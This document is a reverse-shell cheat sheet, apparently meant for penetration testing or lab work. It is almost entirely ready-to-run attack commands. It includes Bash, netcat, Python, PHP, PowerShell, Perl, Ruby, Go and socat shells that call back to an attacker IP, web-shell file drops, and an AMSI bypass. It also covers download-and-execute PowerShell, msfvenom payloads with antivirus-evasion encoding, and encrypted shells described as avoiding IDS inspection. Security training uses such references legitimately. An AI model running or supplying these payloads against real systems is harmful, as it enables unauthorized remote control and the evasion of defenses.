
Reverse Shells Cheat Sheet


#BASH

# 1. Basic /dev/tcp (most common)
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1

# 2. Alternative syntax
exec 5<>/dev/tcp/10.10.14.5/4444; cat <&5 | while read line; do $line 2>&5 >&5; done

# 3. bash -c wrapper (&> redirect; not a named pipe — the named-pipe forms are in the netcat section)
bash -c 'exec bash -i &>/dev/tcp/10.10.14.5/4444 <&1'

# 4. sh -i variant
0<&196;exec 196<>/dev/tcp/10.10.14.5/4444; sh <&196 >&196 2>&196

# 5. /bin/bash explicit
/bin/bash -l > /dev/tcp/10.10.14.5/4444 0<&1 2>&1

# URL-encoded bash
bash+-i+>%26+/dev/tcp/10.10.14.5/4444+0>%261

#NETCAT (NC)

# Traditional Netcat (-e flag)
nc -e /bin/sh 10.10.14.5 4444
nc -e /bin/bash 10.10.14.5 4444
nc -e /usr/bin/bash 10.10.14.5 4444

# OpenBSD Netcat (no -e flag)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.5 4444 > /tmp/f

# Named pipe + netcat combination
mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc 10.10.14.5 4444 1>/tmp/backpipe

#PYTHON

# Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Python 3 (compact)
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.5",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

# Python 3 (single line, pty) — NOTE: as written this one-liner does not run (`socket().__init__()` returns None, so the chained call fails)
python3 -c '__import__("os").dup2(__import__("socket").socket().__init__().__class__.create_connection(("10.10.14.5",4444)).fileno(),0);__import__("os").dup2(0,1);__import__("os").dup2(0,2);__import__("pty").spawn("/bin/bash")'

# Python 2 (legacy)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

#PHP

# PHP exec
php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# PHP shell_exec
php -r '$sock=fsockopen("10.10.14.5",4444);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

# PHP system
php -r '$sock=fsockopen("10.10.14.5",4444);system("/bin/sh -i <&3 >&3 2>&3");'

# PHP passthru
php -r '$sock=fsockopen("10.10.14.5",4444);passthru("/bin/sh -i <&3 >&3 2>&3");'

# PHP reverse shell (inline, short)
php -r '$sock=fsockopen("10.10.14.5",4444);$proc=proc_open("sh",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'

# PHP webshell one-liner (write to file)
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/cmd.php
echo '<?php exec("/bin/bash -c \"bash -i >& /dev/tcp/10.10.14.5/4444 0>&1\""); ?>' | tee /var/www/html/rev.php

#POWERSHELL

# AMSI bypass prefix — run this BEFORE any PowerShell payload on targets with Defender:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# ConPtyShell (Windows 10 1809+) — fully interactive terminal:
# Attacker: stty raw -echo; (stty size; cat) | nc -lvnp 4444
# Target: IEX(IWR http://10.10.14.5/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.5 4444
# 1. Basic TCP (PowerShell)
powershell -c "$client=New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# 2. PowerCat (if available)
powercat -c 10.10.14.5 -p 4444 -e cmd.exe

# 3. Nishang Invoke-PowerShellTcp (file-based)
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/Invoke-PowerShellTcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 4444

# 4. Encoded (base64) variant
$cmd='...'; $enc=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))
powershell -enc $enc

# 5. ConPty variant (better terminal; same approach as the ConPtyShell entry above)
powershell -c "IEX(IWR http://10.10.14.5/ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.5 4444"

#PERL

# Perl reverse shell (Linux)
perl -e 'use Socket;$i="10.10.14.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Perl (Windows)
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr=>"10.10.14.5:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

#RUBY

# Ruby reverse shell
ruby -rsocket -e'f=TCPSocket.open("10.10.14.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Ruby (no -rsocket)
ruby -e 'require "socket";exit if fork;c=TCPSocket.new("10.10.14.5","4444");loop{c.gets.chomp!;(c.puts(`$_`) rescue nil);}'

#GOLANG

# Golang reverse shell
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.10.14.5:4444");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/rev.go && go run /tmp/rev.go

#SOCAT

# Socat reverse shell (Linux)
socat TCP:10.10.14.5:4444 EXEC:/bin/bash
socat TCP:10.10.14.5:4444 EXEC:/bin/sh,pty,stderr,setsid,sigint,sane

# Socat listener (attacker)
socat file:`tty`,raw,echo=0 TCP-L:4444

# Socat reverse shell (Windows)
socat.exe TCP:10.10.14.5:4444 EXEC:cmd.exe,pipes

# Encrypted socat (both sides) — verify=0 disables certificate verification: the channel is encrypted but neither end is authenticated
# Attacker: socat OPENSSL-LISTEN:4444,cert=bind.pem,verify=0,fork STDOUT
# Target: socat OPENSSL:10.10.14.5:4444,verify=0 EXEC:/bin/bash

#MSFVENOM STAGERS

# Linux ELF binary
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell_x86.elf

# Linux (shell command string)
msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.5 LPORT=4444 -f raw

# Windows EXE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell_x86.exe

# Windows DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o shell.dll

# Web payloads (PHP, JSP, WAR, ASP)
msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.jsp
msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f war -o shell.war
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f asp -o shell.asp
msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.14.5 LPORT=4444

# Python / NodeJS / macOS
msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.5 LPORT=4444 -f raw
msfvenom -p nodejs/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444
msfvenom -p osx/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f macho -o shell.macho

# Stageless vs staged: "_" joining stage and transport = stageless (shell_reverse_tcp, meterpreter_reverse_tcp; cmd/unix/reverse_bash is also stageless)
# "/" between them = staged (shell/reverse_tcp, meterpreter/reverse_tcp)

#SHELL UPGRADE / TTY STABILIZATION

# 1. Python pty (most common)
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

# 2. Full sequence (after pty)
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z                    # background netcat shell
stty raw -echo; fg        # in YOUR terminal, then press Enter
export TERM=xterm
export SHELL=bash
stty rows 59 columns 235  # set your terminal size

# 3. Script command (if python missing)
/usr/bin/script -qc /bin/bash /dev/null
script /dev/null -c bash

# 4. rlwrap (attacker side, before connecting)
rlwrap nc -lvnp 4444
# then after shell: Ctrl+Z, stty raw -echo; fg

# 5. Socat full TTY (requires socat on target)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.5:4444

# 6. Set terminal rows/cols after upgrade
stty -a             # check your local terminal size
stty rows X columns Y

#MSFCONSOLE LISTENER + HANDLER

# Start msfconsole multi/handler
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.14.5; set LPORT 4444; exploit"

# Inside msfconsole
use multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
set ExitOnSession false
exploit -j                         # run as background job
sessions -l                        # list sessions
sessions -i 1                      # interact with session 1

# Auto-run scripts on connect
set AutoRunScript post/windows/manage/migrate
set AutoRunScript post/multi/manage/autoroute subnet=10.10.10.0 netmask=255.255.255.0

#QUICK SHELL TEST / CONNECTIVITY CHECK

# Ping test
target: ping -c 1 10.10.14.5

# Port connectivity test (bash)
target: timeout 3 bash -c 'echo >/dev/tcp/10.10.14.5/4444' && echo "open" || echo "blocked"

# Port connectivity test (curl)
target: curl http://10.10.14.5:8000/test.txt

# Start simple HTTP server to test connectivity
attacker: python3 -m http.server 8000

#ENCRYPTED SHELLS (TLS/SSL)

# Encrypted shells (avoid IDS inspection):
ncat --ssl -lvnp 4444                                    # ncat SSL listener
socat openssl-listen:4444,reuseaddr,fork EXEC:cmd.exe    # socat SSL bind shell (Windows): this listens rather than connecting back
socat openssl-listen:4444,reuseaddr,fork EXEC:/bin/bash  # socat SSL bind shell (Linux): this listens rather than connecting back

#MODERN SHELL TOOLS

# pwncat-cs — auto-stabilization + session management
pwncat-cs -lp 4444  # auto-stabilization + session management

#MSFVENOM EVASION

# msfvenom with encoder and iterations for AV evasion:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -e x64/zutto_dekiru -i 3 -o shell.exe